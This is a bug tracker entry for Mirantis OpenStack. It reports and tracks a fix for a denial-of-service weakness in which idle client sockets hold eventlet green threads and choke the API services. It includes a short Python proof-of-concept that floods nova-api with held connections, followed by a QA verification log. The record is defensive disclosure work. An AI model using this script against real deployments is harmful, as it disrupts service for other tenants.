[no-OSSN-yet] Eventlet green threads not released back to the pool leading to choking of new requests (no-CVE-yet)

Bug #1506600 reported by Adam Heczko
270
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Mirantis OpenStack
Fix Released
Medium
Alexey Khivin
5.1.x
Won't Fix
Medium
Unassigned
6.0.x
Won't Fix
Medium
Unassigned
6.1.x
Won't Fix
Medium
Unassigned

Bug Description

Tushar Patil reported vulnerability affecting all or most of OpenStack APIs.

It is possible to choke OpenStack API controller services using wsgi+eventlet library by simply not closing the client socket connection. Whenever a request is received by any OpenStack API service for example nova api service, eventlet library creates a green thread from the pool and starts processing the request. Even after the response is sent to the caller, the green thread is not returned back to the pool until the client socket connection is closed. This way, any malicious user can send many API requests to the API controller node and determine the wsgi pool size configured for the given service and then send those many requests to the service and after receiving the response, wait there infinitely doing nothing leading to disrupting services for other tenants. Even when service providers have enabled rate limiting feature, it is possible to choke the API services with a group (many tenants) attack.

References to proposed upstream patches:
https://bugs.launchpad.net/nova/+bug/1361360

Please review if this applies to MOS, every single API component we ship with 7.0

Tags: heat
Revision history for this message
Vitaly Sedelnik (vsedelnik) wrote :

https://review.openstack.org/224941 needs to be cherry-picked

Changed in mos:
status: New → Confirmed
assignee: nobody → MOS Maintenance (mos-maintenance)
tags: added: 70mu1-confirmed
Revision history for this message
Adam Heczko (aheczko-mirantis) wrote :

Agree, note that this applies to all APIs running under eventlet, not only Heat.

Alexey Khivin (akhivin)
Changed in mos:
assignee: MOS Maintenance (mos-maintenance) → Alexey Khivin (akhivin)
Alexey Khivin (akhivin)
Changed in mos:
status: Confirmed → In Progress
tags: added: heat
Alexey Khivin (akhivin)
Changed in mos:
status: In Progress → Fix Committed
Revision history for this message
Adam Heczko (aheczko-mirantis) wrote :

Hi, are all APIs shipping with MOS and affected by this issue patched?
Or just Heat only?

tags: removed: 70mu1-confirmed
Revision history for this message
Adam Heczko (aheczko-mirantis) wrote :

Enentlet green threds choking is described in upstream bug report.
Steps to reproduce choking vulnerability:

Following program illustrates choking of nova-api services (but this problem is omnipresent in all other OpenStack API Services using wsgi+eventlet)

Note: I have explicitly set the wsi_default_pool_size default value to 10 in order to reproduce this problem in nova/wsgi.py.
After you run the below program, you should try to invoke API
============================================================================================
import time
import requests
from multiprocessing import Process

def request(number):
   #Port is important here
   path = 'http://127.0.0.1:8774/servers'
    try:
        response = requests.get(path)
        print "RESPONSE %s-%d" % (response.status_code, number)
        #during this sleep time, check if the client socket connection is released or not on the API controller node.
        time.sleep(1000)
        print “Thread %d complete" % number
    except requests.exceptions.RequestException as ex:
        print “Exception occurred %d-%s" % (number, str(ex))

if __name__ == '__main__':
    processes = []
    for number in range(40):
        p = Process(target=request, args=(number,))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()

================================================================================================

Revision history for this message
Timur Nurlygayanov (tnurlygayanov) wrote :
Download full text (3.1 KiB)

Verified on my QA lab with MOS 7.0 MU1,

Steps To Verify:
1. Take scripts from comment #4, which was provided by Adam.
2. Run this script on controller node.
3. Run 'nova list', 'nova flavor-list'.

Observed Result:

In one console:
________________________________
root@node-12:~# python test.py
RESPONSE 300-3
RESPONSE 300-2
RESPONSE 300-4
RESPONSE 300-0
RESPONSE 300-8
RESPONSE 300-9
RESPONSE 300-6
RESPONSE 300-7
RESPONSE 300-1
RESPONSE 300-5
RESPONSE 300-10
RESPONSE 300-12
RESPONSE 300-11
RESPONSE 300-13
RESPONSE 300-15
RESPONSE 300-14
RESPONSE 300-16
RESPONSE 300-20
RESPONSE 300-17
RESPONSE 300-21
RESPONSE 300-22
RESPONSE 300-18
RESPONSE 300-19
RESPONSE 300-26
RESPONSE 300-27
RESPONSE 300-23
RESPONSE 300-25
RESPONSE 300-24
RESPONSE 300-31
RESPONSE 300-28
RESPONSE 300-29
RESPONSE 300-30
RESPONSE 300-32
RESPONSE 300-34
RESPONSE 300-36
RESPONSE 300-39
RESPONSE 300-35
RESPONSE 300-33
RESPONSE 300-38
RESPONSE 300-37
________________________________

in other console:
________________________________
root@node-13:~# nova list
+--------------------------------------+---------+--------+------------+-------------+---------------------------------+
| ID | Name | Status | Task State | Power State | Networks |
+--------------------------------------+---------+--------+------------+-------------+---------------------------------+
| 18115f2c-accb-4db5-a366-fdc72e627558 | vm_EW_1 | ACTIVE | - | Running | net_EW_1=10.1.1.5 |
| a1933565-3d4b-455b-81f5-9bd79fd128f0 | vm_EW_2 | ACTIVE | - | Running | net_EW_2=10.1.2.5 |
| b6153f67-9401-4192-bdcb-dc684d7cf8b0 | vm_NS | ACTIVE | - | Running | net_NS=10.2.0.5, 172.18.161.201 |
+--------------------------------------+---------+--------+------------+-------------+---------------------------------+
root@node-13:~# nova flavor-list
+--------------------------------------+-----------+-----------+------+-----------+------+-------+-------------+-----------+
| ID | Name | Memory_MB | Disk | Ephemeral | Swap | VCPUs | RXTX_Factor | Is_Public |
+--------------------------------------+-----------+-----------+------+-----------+------+-------+-------------+-----------+
| 1 | m1.tiny | 512 | 1 | 0 | | 1 | 1.0 | True |
| 2 | m1.small | 2048 | 20 | 0 | | 1 | 1.0 | True |
| 3 | m1.medium | 4096 | 40 | 0 | | 2 | 1.0 | True |
| 4 | m1.large | 8192 | 80 | 0 | | 4 | 1.0 | True |
| 5 | m1.xlarge | 16384 | 160 | 0 | | 8 | 1.0 | True |
| d646cf39-ece7-42c9-841a-b230ebc8c74b | m1.micro | 64 | 0 | 0 | | 1 | 1.0 | True |
+--------------------------------------+-----------+-----------+------+-----------+------+-------+-------------+-----------+
________________...

Read more...

Changed in mos:
status: Fix Committed → Fix Released
Changed in mos:
importance: High → Medium
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.